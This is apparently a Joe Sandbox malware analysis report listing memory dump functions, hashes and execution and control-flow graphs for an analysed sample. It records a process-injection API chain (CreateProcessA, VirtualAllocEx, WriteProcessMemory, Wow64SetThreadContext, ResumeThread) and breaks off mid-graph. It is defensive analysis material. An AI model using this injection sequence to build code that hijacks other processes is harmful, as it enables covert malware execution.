                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df3864d28322f24ec37525731ed696258d765f62208390819b09b0d9216b563f
                        • Instruction ID: 294f8f441646e7c627e7f87f5145fafe5e816cbbf3a81d735a56d238b6b6f918
                        • Opcode Fuzzy Hash: df3864d28322f24ec37525731ed696258d765f62208390819b09b0d9216b563f
                        • Instruction Fuzzy Hash: 2C1285B0C827458AE310CFA5F94C1893BB1BB45319BE04E09E261AB6E5DBF8117ACF54
                        Function 06A2E748 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 800676690f6485327b802660066a4f09d9eb61ecbfff1ea636cacfce991be703
                        • Instruction ID: 65bd85e65ccf1882d68126f3e71f980983017bcedde386075bde53bae1fc9c72
                        • Opcode Fuzzy Hash: 800676690f6485327b802660066a4f09d9eb61ecbfff1ea636cacfce991be703
                        • Instruction Fuzzy Hash: 13E11C74E002198FDB54DFA9C580AAEFBF2FF89305F248169D455AB356D730A981CFA0
                        Function 06A2E310 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7bc2fbb5af23df3d6c5476b7ea50bac85c1693da61da542acba5c1a3174300ed
                        • Instruction ID: 7004721f70cefa6eeab9177966778dc540e671834d72b3c71c7a3a194c4fd337
                        • Opcode Fuzzy Hash: 7bc2fbb5af23df3d6c5476b7ea50bac85c1693da61da542acba5c1a3174300ed
                        • Instruction Fuzzy Hash: 38E1FA74E102198FDB14DFA9C5809AEFBF2FF89305F248169D414AB356D731A982CFA4
                        Function 06A2DAA0 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd8368c7d035d2c2ebf905ffda3c8bc5fc0bcdab12692e5e1a64933cb0ffc630
                        • Instruction ID: 9fa3f2a2526460b58d4909e627f0573ff0059786c122f309c975232405b1e0e9
                        • Opcode Fuzzy Hash: dd8368c7d035d2c2ebf905ffda3c8bc5fc0bcdab12692e5e1a64933cb0ffc630
                        • Instruction Fuzzy Hash: 64E10C74E102198FDB54EFA9C5809AEFBF2FF89305F248169D414AB356D730A942CFA4
                        Function 06A263DA Relevance: .3, Instructions: 268COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 27184ac72edf87d9a939c1bc3713ffe10f8cac4dbaf070f3e2396f87c3162e6a
                        • Instruction ID: 2fd811a70f38e3ee6126a77630f7f19401ca0bc0abd4a8623eda7078eb50571d
                        • Opcode Fuzzy Hash: 27184ac72edf87d9a939c1bc3713ffe10f8cac4dbaf070f3e2396f87c3162e6a
                        • Instruction Fuzzy Hash: D0D10631D1075A8EDB10EB64D950A99F7B1FF96300F10879AE50A3B225FB70AAD5CB90
                        Function 06A263E8 Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3dcd1810cf4d9b7b79f4d9347cd1518ee8307de34216e9ec40ec4fa89d114784
                        • Instruction ID: 3ff8480f6a134f28ee20e66a52f9cf6d051e0ab1b42e505f7c9c50665bad6584
                        • Opcode Fuzzy Hash: 3dcd1810cf4d9b7b79f4d9347cd1518ee8307de34216e9ec40ec4fa89d114784
                        • Instruction Fuzzy Hash: 10D1F631D1075A8EDB10EB64D950A99F7B1FF96300F10C79AE50A3B225FB70AAD5CB90
                        Function 049E0448 Relevance: .3, Instructions: 260COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5fe7bbadcfac76033ce8a64088013a5f28563c54e4ca18338a29385fc8268d1
                        • Instruction ID: d59d090e4c9c6d8ae3a71a3bd8a5776c0335e87b556dc7dbeba09fef9f340b20
                        • Opcode Fuzzy Hash: f5fe7bbadcfac76033ce8a64088013a5f28563c54e4ca18338a29385fc8268d1
                        • Instruction Fuzzy Hash: C9A18E32E00225CFCF06DFB6C8405AEB7B2FF85305B15857AE805AB211DBB5E955CB80
                        Function 049E0DF8 Relevance: .2, Instructions: 225COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b89f707062734d09dd16ea9bfd3b34d89d3677c55293f8672e77c05250f62087
                        • Instruction ID: d9353a129294e9a2198cd0e9e6b9f457dcf2cf767a83fe62a31e0bc359d28325
                        • Opcode Fuzzy Hash: b89f707062734d09dd16ea9bfd3b34d89d3677c55293f8672e77c05250f62087
                        • Instruction Fuzzy Hash: D4C1D5B0C827458AD714CFA5F84C1897BB1BB85325BA14F09E261AB6E0DBF8147ACF54
                        Function 06A2E2FF Relevance: .2, Instructions: 171COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87c2149e44a2dc782add5af279a4e5b5a76d98ad47a70fd26f78b44d98594244
                        • Instruction ID: 2e49f0a2a259ed5e11b0c1a5761a1081389287c80d509ee42f5f3f950ecd2af4
                        • Opcode Fuzzy Hash: 87c2149e44a2dc782add5af279a4e5b5a76d98ad47a70fd26f78b44d98594244
                        • Instruction Fuzzy Hash: 6171FC74E002198FDB14DFA9C5819AEFBF2FF89314F24816AD418AB356D7319981CFA1
                        Function 06A2E738 Relevance: .1, Instructions: 134COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0cc73ac36f73d2f8854f80283f4089b00cc6b2c813a8dc31c8c93d08dea7d98
                        • Instruction ID: 60717728281e1c013e6ade58aa0ea5dcde3d60a44e74b81a9b145415fe10a541
                        • Opcode Fuzzy Hash: b0cc73ac36f73d2f8854f80283f4089b00cc6b2c813a8dc31c8c93d08dea7d98
                        • Instruction Fuzzy Hash: 73511C74E042198FDB14DFA9C5805AEFBF2FF89304F24816AD458AB356D7319941CFA1

                        Execution Graph

                        Execution Coverage:8.6%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:253
                        Total number of Limit Nodes:14
                        execution_graph 48082 159bd58 48085 159be3f 48082->48085 48083 159bd67 48086 159be61 48085->48086 48087 159be84 48085->48087 48086->48087 48093 159c0d8 48086->48093 48097 159c0e8 48086->48097 48087->48083 48088 159c088 GetModuleHandleW 48090 159c0b5 48088->48090 48089 159be7c 48089->48087 48089->48088 48090->48083 48094 159c0e8 48093->48094 48096 159c121 48094->48096 48101 159b888 48094->48101 48096->48089 48098 159c0fc 48097->48098 48099 159b888 LoadLibraryExW 48098->48099 48100 159c121 48098->48100 48099->48100 48100->48089 48102 159c2c8 LoadLibraryExW 48101->48102 48104 159c341 48102->48104 48104->48096 48105 159e258 DuplicateHandle 48106 159e2ee 48105->48106 48180 159dc08 48181 159dc4e GetCurrentProcess 48180->48181 48183 159dca0 GetCurrentThread 48181->48183 48186 159dc99 48181->48186 48184 159dcdd GetCurrentProcess 48183->48184 48187 159dcd6 48183->48187 48185 159dd13 GetCurrentThreadId 48184->48185 48189 159dd6c 48185->48189 48186->48183 48187->48184 48107 57226b0 48108 5722718 CreateWindowExW 48107->48108 48110 57227d4 48108->48110 48380 57f63d8 48381 57f63dd 48380->48381 48385 57fb6f8 48381->48385 48392 57fb6e9 48381->48392 48382 57f6b53 48386 57fb71c 48385->48386 48387 57fb723 48385->48387 48386->48382 48391 57fb74a 48387->48391 48399 57f635c 48387->48399 48390 57f635c GetCurrentThreadId 48390->48391 48391->48382 48393 57fb71c 48392->48393 48394 57fb723 48392->48394 48393->48382 48395 57f635c GetCurrentThreadId 48394->48395 48398 57fb74a 48394->48398 48396 57fb740 48395->48396 48397 57f635c GetCurrentThreadId 48396->48397 48397->48398 48398->48382 48400 57f6367 48399->48400 48401 57fba5f GetCurrentThreadId 48400->48401 48402 57fb740 48400->48402 48401->48402 48402->48390 48111 154d01c 48112 154d034 48111->48112 48113 154d08e 48112->48113 48118 5720254 48112->48118 48126 5722859 48112->48126 48130 5722868 48112->48130 48134 5723598 48112->48134 48119 572025f 48118->48119 48120 5723609 48119->48120 48122 57235f9 48119->48122 48152 572037c 48120->48152 48142 5723723 48122->48142 48147 5723730 48122->48147 48123 5723607 48127 5722868 48126->48127 48128 5720254 3 API calls 48127->48128 48129 57228af 48128->48129 48129->48113 48131 572288e 48130->48131 48132 5720254 3 API calls 48131->48132 48133 57228af 48132->48133 48133->48113 48135 57235a8 48134->48135 48136 5723609 48135->48136 48139 57235f9 48135->48139 48137 572037c 3 API calls 48136->48137 48138 5723607 48137->48138 48140 5723723 3 API calls 48139->48140 48141 5723730 3 API calls 48139->48141 48140->48138 48141->48138 48143 5723730 48142->48143 48159 57237db 48143->48159 48164 57237e8 48143->48164 48144 57237d0 48144->48123 48148 5723744 48147->48148 48150 57237db 3 API calls 48148->48150 48151 57237e8 3 API calls 48148->48151 48149 57237d0 48149->48123 48150->48149 48151->48149 48153 5720387 48152->48153 48154 5724c92 48153->48154 48155 5724d3c 48153->48155 48157 5724cea CallWindowProcW 48154->48157 48158 5724c99 48154->48158 48156 5720254 2 API calls 48155->48156 48156->48158 48157->48158 48158->48123 48160 57237e2 48159->48160 48161 5723849 48159->48161 48162 57237f9 48160->48162 48167 5724b07 48160->48167 48162->48144 48165 57237f9 48164->48165 48166 5724b07 3 API calls 48164->48166 48165->48144 48166->48165 48171 5724b1e 48167->48171 48168 5724bd5 48169 5724c0f 48168->48169 48179 5724c7e CallWindowProcW CallWindowProcW CallWindowProcW 48168->48179 48169->48162 48171->48168 48174 5724c18 48171->48174 48172 5724c8f 48173 5724cea CallWindowProcW 48172->48173 48175 5724c99 48172->48175 48173->48175 48174->48172 48176 5724c2b 48174->48176 48175->48162 48177 572037c 2 API calls 48176->48177 48178 5724c3a 48177->48178 48178->48162 48179->48172 48190 7ab1333 48191 7ab114e 48190->48191 48192 7ab12fc 48191->48192 48196 7ab3408 48191->48196 48211 7ab3476 48191->48211 48226 7ab3418 48191->48226 48192->48192 48197 7ab33d2 48196->48197 48198 7ab3412 48196->48198 48197->48192 48199 7ab3456 48198->48199 48240 7ab38b0 48198->48240 48245 7ab3939 48198->48245 48249 7ab3d3a 48198->48249 48253 7ab38fa 48198->48253 48257 7ab3c44 48198->48257 48262 7ab3845 48198->48262 48269 7ab3bcd 48198->48269 48275 7ab3a28 48198->48275 48280 7ab39a8 48198->48280 48285 7ab3c15 48198->48285 48290 7ab3b56 48198->48290 48199->48192 48212 7ab3479 48211->48212 48213 7ab3404 48211->48213 48214 7ab33d2 48213->48214 48215 7ab39a8 2 API calls 48213->48215 48216 7ab3a28 2 API calls 48213->48216 48217 7ab3bcd 2 API calls 48213->48217 48218 7ab3845 4 API calls 48213->48218 48219 7ab3c44 2 API calls 48213->48219 48220 7ab38fa 2 API calls 48213->48220 48221 7ab3d3a 2 API calls 48213->48221 48222 7ab3939 2 API calls 48213->48222 48223 7ab38b0 2 API calls 48213->48223 48224 7ab3b56 2 API calls 48213->48224 48225 7ab3c15 2 API calls 48213->48225 48214->48192 48215->48214 48216->48214 48217->48214 48218->48214 48219->48214 48220->48214 48221->48214 48222->48214 48223->48214 48224->48214 48225->48214 48227 7ab3432 48226->48227 48228 7ab3456 48227->48228 48229 7ab39a8 2 API calls 48227->48229 48230 7ab3a28 2 API calls 48227->48230 48231 7ab3bcd 2 API calls 48227->48231 48232 7ab3845 4 API calls 48227->48232 48233 7ab3c44 2 API calls 48227->48233 48234 7ab38fa 2 API calls 48227->48234 48235 7ab3d3a 2 API calls 48227->48235 48236 7ab3939 2 API calls 48227->48236 48237 7ab38b0 2 API calls 48227->48237 48238 7ab3b56 2 API calls 48227->48238 48239 7ab3c15 2 API calls 48227->48239 48228->48192 48229->48228 48230->48228 48231->48228 48232->48228 48233->48228 48234->48228 48235->48228 48236->48228 48237->48228 48238->48228 48239->48228 48242 7ab38b9 48240->48242 48241 7ab4037 48295 7ab0aaa 48242->48295 48299 7ab0ab0 48242->48299 48247 7ab0aaa WriteProcessMemory 48245->48247 48248 7ab0ab0 WriteProcessMemory 48245->48248 48246 7ab3967 48246->48199 48247->48246 48248->48246 48303 7ab0918 48249->48303 48307 7ab0910 48249->48307 48250 7ab3d54 48255 7ab0918 Wow64SetThreadContext 48253->48255 48256 7ab0910 Wow64SetThreadContext 48253->48256 48254 7ab3919 48254->48199 48255->48254 48256->48254 48258 7ab3c4a 48257->48258 48260 7ab0aaa WriteProcessMemory 48258->48260 48261 7ab0ab0 WriteProcessMemory 48258->48261 48259 7ab3b94 48259->48199 48260->48259 48261->48259 48311 7ab0d38 48262->48311 48315 7ab0d2d 48262->48315 48263 7ab4037 48264 7ab388a 48265 7ab0aaa WriteProcessMemory 48264->48265 48266 7ab0ab0 WriteProcessMemory 48264->48266 48265->48263 48266->48263 48270 7ab3bde 48269->48270 48271 7ab3f86 48270->48271 48273 7ab0aaa WriteProcessMemory 48270->48273 48274 7ab0ab0 WriteProcessMemory 48270->48274 48271->48199 48272 7ab3b94 48272->48199 48273->48272 48274->48272 48276 7ab39d9 48275->48276 48276->48275 48277 7ab3afc 48276->48277 48319 7ab0b98 48276->48319 48323 7ab0ba0 48276->48323 48277->48199 48281 7ab39ae 48280->48281 48327 7ab4668 48281->48327 48332 7ab4658 48281->48332 48282 7ab3fe3 48286 7ab3e63 48285->48286 48345 7ab09ea 48286->48345 48349 7ab09f0 48286->48349 48287 7ab3e81 48291 7ab38b9 48290->48291 48291->48290 48293 7ab0aaa WriteProcessMemory 48291->48293 48294 7ab0ab0 WriteProcessMemory 48291->48294 48292 7ab4037 48293->48292 48294->48292 48296 7ab0ab0 WriteProcessMemory 48295->48296 48298 7ab0b4f 48296->48298 48298->48241 48300 7ab0af8 WriteProcessMemory 48299->48300 48302 7ab0b4f 48300->48302 48302->48241 48304 7ab095d Wow64SetThreadContext 48303->48304 48306 7ab09a5 48304->48306 48306->48250 48308 7ab0918 Wow64SetThreadContext 48307->48308 48310 7ab09a5 48308->48310 48310->48250 48312 7ab0dc1 48311->48312 48312->48312 48313 7ab0f26 CreateProcessA 48312->48313 48314 7ab0f83 48313->48314 48316 7ab0dc1 48315->48316 48316->48316 48317 7ab0f26 CreateProcessA 48316->48317 48318 7ab0f83 48317->48318 48320 7ab0ba0 ReadProcessMemory 48319->48320 48322 7ab0c2f 48320->48322 48322->48276 48324 7ab0beb ReadProcessMemory 48323->48324 48326 7ab0c2f 48324->48326 48326->48276 48328 7ab467d 48327->48328 48337 7ab0868 48328->48337 48341 7ab0860 48328->48341 48329 7ab4690 48329->48282 48333 7ab467d 48332->48333 48335 7ab0868 ResumeThread 48333->48335 48336 7ab0860 ResumeThread 48333->48336 48334 7ab4690 48334->48282 48335->48334 48336->48334 48338 7ab08a8 ResumeThread 48337->48338 48340 7ab08d9 48338->48340 48340->48329 48342 7ab08a8 ResumeThread 48341->48342 48344 7ab08d9 48342->48344 48344->48329 48346 7ab09f0 VirtualAllocEx 48345->48346 48348 7ab0a6d 48346->48348 48348->48287 48350 7ab0a30 VirtualAllocEx 48349->48350 48352 7ab0a6d 48350->48352 48352->48287 48353 1592180 48354 159218a 48353->48354 48356 1592280 48353->48356 48357 15922a5 48356->48357 48361 1592390 48357->48361 48365 1592380 48357->48365 48363 15923b7 48361->48363 48362 1592494 48363->48362 48369 1591fb8 48363->48369 48367 15923b7 48365->48367 48366 1592494 48366->48366 48367->48366 48368 1591fb8 CreateActCtxA 48367->48368 48368->48366 48370 1593420 CreateActCtxA 48369->48370 48372 15934e3 48370->48372 48373 7ab46b0 48375 7ab46d6 48373->48375 48376 7ab483b 48373->48376 48375->48376 48377 7ab2b64 48375->48377 48378 7ab4930 PostMessageW 48377->48378 48379 7ab499c 48378->48379 48379->48375

                        Executed Functions

                        Function 07AB3CFA Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7540dc59b19f7f1d67f32ee57ad85410bc9873cccde2e31ad74e19ac2335e6a
                        • Instruction ID: d3551ee0cce0018a619b7b84378dafa6db3057fd6a232d1e9dc0aa0b2aa1ad6b
                        • Opcode Fuzzy Hash: e7540dc59b19f7f1d67f32ee57ad85410bc9873cccde2e31ad74e19ac2335e6a
                        • Instruction Fuzzy Hash: 13F0A7B495D2889BC7108B54E4550F4BFBC9B5F211F056193C92DD72A3D6304808CB01
                        Function 07AB3C21 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80779b575362846e720ee6442553a9c30a3ecf02b4fae6429027da7609ab0ea5
                        • Instruction ID: 3a5872cb48e094d248d5a379a7826d1c0fa8fb31b60b34f1679004d37d6b882a
                        • Opcode Fuzzy Hash: 80779b575362846e720ee6442553a9c30a3ecf02b4fae6429027da7609ab0ea5
                        • Instruction Fuzzy Hash: D1E0B6B896D058CACB20DF94E4564F8FBBCAB4F351F4060A6DA2EA3213D6305944CB41
                        Function 0159DC08 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 983 159dc08-159dc97 GetCurrentProcess 987 159dc99-159dc9f 983->987 988 159dca0-159dcd4 GetCurrentThread 983->988 987->988 989 159dcdd-159dd11 GetCurrentProcess 988->989 990 159dcd6-159dcdc 988->990 991 159dd1a-159dd32 989->991 992 159dd13-159dd19 989->992 990->989 996 159dd3b-159dd6a GetCurrentThreadId 991->996 992->991 997 159dd6c-159dd72 996->997 998 159dd73-159ddd5 996->998 997->998
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 0159DC86
                        • GetCurrentThread.KERNEL32 ref: 0159DCC3
                        • GetCurrentProcess.KERNEL32 ref: 0159DD00
                        • GetCurrentThreadId.KERNEL32 ref: 0159DD59
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205697017.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1590000_jdSldfVS.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: e9e9dc4a83434fd45b2699ebdb3fef3bd75a323cb5c8e9d70a11be0eab893279
                        • Instruction ID: 2858aec23a96a320a8553d3bc949dc5b86d011d55dbb4c33e07151434527fe2d
                        • Opcode Fuzzy Hash: e9e9dc4a83434fd45b2699ebdb3fef3bd75a323cb5c8e9d70a11be0eab893279
                        • Instruction Fuzzy Hash: D55145B090134ACFEB04DFAAD548BDEBBF1BF88304F248459D119AB360DB795944CB66
                        Function 07AB0D2D Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1004 7ab0d2d-7ab0dcd 1006 7ab0dcf-7ab0dd9 1004->1006 1007 7ab0e06-7ab0e26 1004->1007 1006->1007 1008 7ab0ddb-7ab0ddd 1006->1008 1014 7ab0e28-7ab0e32 1007->1014 1015 7ab0e5f-7ab0e8e 1007->1015 1009 7ab0ddf-7ab0de9 1008->1009 1010 7ab0e00-7ab0e03 1008->1010 1012 7ab0deb 1009->1012 1013 7ab0ded-7ab0dfc 1009->1013 1010->1007 1012->1013 1013->1013 1016 7ab0dfe 1013->1016 1014->1015 1017 7ab0e34-7ab0e36 1014->1017 1023 7ab0e90-7ab0e9a 1015->1023 1024 7ab0ec7-7ab0f81 CreateProcessA 1015->1024 1016->1010 1019 7ab0e59-7ab0e5c 1017->1019 1020 7ab0e38-7ab0e42 1017->1020 1019->1015 1021 7ab0e46-7ab0e55 1020->1021 1022 7ab0e44 1020->1022 1021->1021 1025 7ab0e57 1021->1025 1022->1021 1023->1024 1026 7ab0e9c-7ab0e9e 1023->1026 1035 7ab0f8a-7ab1010 1024->1035 1036 7ab0f83-7ab0f89 1024->1036 1025->1019 1028 7ab0ec1-7ab0ec4 1026->1028 1029 7ab0ea0-7ab0eaa 1026->1029 1028->1024 1030 7ab0eae-7ab0ebd 1029->1030 1031 7ab0eac 1029->1031 1030->1030 1033 7ab0ebf 1030->1033 1031->1030 1033->1028 1046 7ab1012-7ab1016 1035->1046 1047 7ab1020-7ab1024 1035->1047 1036->1035 1046->1047 1048 7ab1018 1046->1048 1049 7ab1026-7ab102a 1047->1049 1050 7ab1034-7ab1038 1047->1050 1048->1047 1049->1050 1053 7ab102c 1049->1053 1051 7ab103a-7ab103e 1050->1051 1052 7ab1048-7ab104c 1050->1052 1051->1052 1054 7ab1040 1051->1054 1055 7ab105e-7ab1065 1052->1055 1056 7ab104e-7ab1054 1052->1056 1053->1050 1054->1052 1057 7ab107c 1055->1057 1058 7ab1067-7ab1076 1055->1058 1056->1055 1060 7ab107d 1057->1060 1058->1057 1060->1060
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB0F6E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: abbe63fc5fccbccf20184a9543d6a8279b4ce6b75af941a85c6407777822ab20
                        • Instruction ID: 6e2e25dc733e8afe045631eab3d315de360909b76e89e2f8c3a85bf02d125426
                        • Opcode Fuzzy Hash: abbe63fc5fccbccf20184a9543d6a8279b4ce6b75af941a85c6407777822ab20
                        • Instruction Fuzzy Hash: 12A15EB1D0025EDFDB20CFA9C8417DEBBB6BF88314F1481A9E818A7241D7759985CF92
                        Function 07AB0D38 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1061 7ab0d38-7ab0dcd 1063 7ab0dcf-7ab0dd9 1061->1063 1064 7ab0e06-7ab0e26 1061->1064 1063->1064 1065 7ab0ddb-7ab0ddd 1063->1065 1071 7ab0e28-7ab0e32 1064->1071 1072 7ab0e5f-7ab0e8e 1064->1072 1066 7ab0ddf-7ab0de9 1065->1066 1067 7ab0e00-7ab0e03 1065->1067 1069 7ab0deb 1066->1069 1070 7ab0ded-7ab0dfc 1066->1070 1067->1064 1069->1070 1070->1070 1073 7ab0dfe 1070->1073 1071->1072 1074 7ab0e34-7ab0e36 1071->1074 1080 7ab0e90-7ab0e9a 1072->1080 1081 7ab0ec7-7ab0f81 CreateProcessA 1072->1081 1073->1067 1076 7ab0e59-7ab0e5c 1074->1076 1077 7ab0e38-7ab0e42 1074->1077 1076->1072 1078 7ab0e46-7ab0e55 1077->1078 1079 7ab0e44 1077->1079 1078->1078 1082 7ab0e57 1078->1082 1079->1078 1080->1081 1083 7ab0e9c-7ab0e9e 1080->1083 1092 7ab0f8a-7ab1010 1081->1092 1093 7ab0f83-7ab0f89 1081->1093 1082->1076 1085 7ab0ec1-7ab0ec4 1083->1085 1086 7ab0ea0-7ab0eaa 1083->1086 1085->1081 1087 7ab0eae-7ab0ebd 1086->1087 1088 7ab0eac 1086->1088 1087->1087 1090 7ab0ebf 1087->1090 1088->1087 1090->1085 1103 7ab1012-7ab1016 1092->1103 1104 7ab1020-7ab1024 1092->1104 1093->1092 1103->1104 1105 7ab1018 1103->1105 1106 7ab1026-7ab102a 1104->1106 1107 7ab1034-7ab1038 1104->1107 1105->1104 1106->1107 1110 7ab102c 1106->1110 1108 7ab103a-7ab103e 1107->1108 1109 7ab1048-7ab104c 1107->1109 1108->1109 1111 7ab1040 1108->1111 1112 7ab105e-7ab1065 1109->1112 1113 7ab104e-7ab1054 1109->1113 1110->1107 1111->1109 1114 7ab107c 1112->1114 1115 7ab1067-7ab1076 1112->1115 1113->1112 1117 7ab107d 1114->1117 1115->1114 1117->1117
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB0F6E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 1787cc534c360e837c524c38a0a79a1f2fed9bc2fe547cf3a624146ae78f2914
                        • Instruction ID: 00cdf3c496250d13e0aa94e9c70845840b15f5d1dcd519deb2904cbf4b8f2cf4
                        • Opcode Fuzzy Hash: 1787cc534c360e837c524c38a0a79a1f2fed9bc2fe547cf3a624146ae78f2914
                        • Instruction Fuzzy Hash: AC9160B1D0025EDFDB20CFA9C8417DEBBB6BF88314F1481A9E818A7241D7759985CF92
                        Function 0159BE3F Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1118 159be3f-159be5f 1119 159be8b-159be8f 1118->1119 1120 159be61-159be6e call 159b824 1118->1120 1121 159be91-159be9b 1119->1121 1122 159bea3-159bee4 1119->1122 1127 159be70 1120->1127 1128 159be84 1120->1128 1121->1122 1129 159bef1-159beff 1122->1129 1130 159bee6-159beee 1122->1130 1176 159be76 call 159c0d8 1127->1176 1177 159be76 call 159c0e8 1127->1177 1128->1119 1131 159bf01-159bf06 1129->1131 1132 159bf23-159bf25 1129->1132 1130->1129 1136 159bf08-159bf0f call 159b830 1131->1136 1137 159bf11 1131->1137 1135 159bf28-159bf2f 1132->1135 1133 159be7c-159be7e 1133->1128 1134 159bfc0-159c080 1133->1134 1169 159c088-159c0b3 GetModuleHandleW 1134->1169 1170 159c082-159c085 1134->1170 1139 159bf3c-159bf43 1135->1139 1140 159bf31-159bf39 1135->1140 1138 159bf13-159bf21 1136->1138 1137->1138 1138->1135 1142 159bf50-159bf59 call 159b840 1139->1142 1143 159bf45-159bf4d 1139->1143 1140->1139 1149 159bf5b-159bf63 1142->1149 1150 159bf66-159bf6b 1142->1150 1143->1142 1149->1150 1151 159bf89-159bf8d 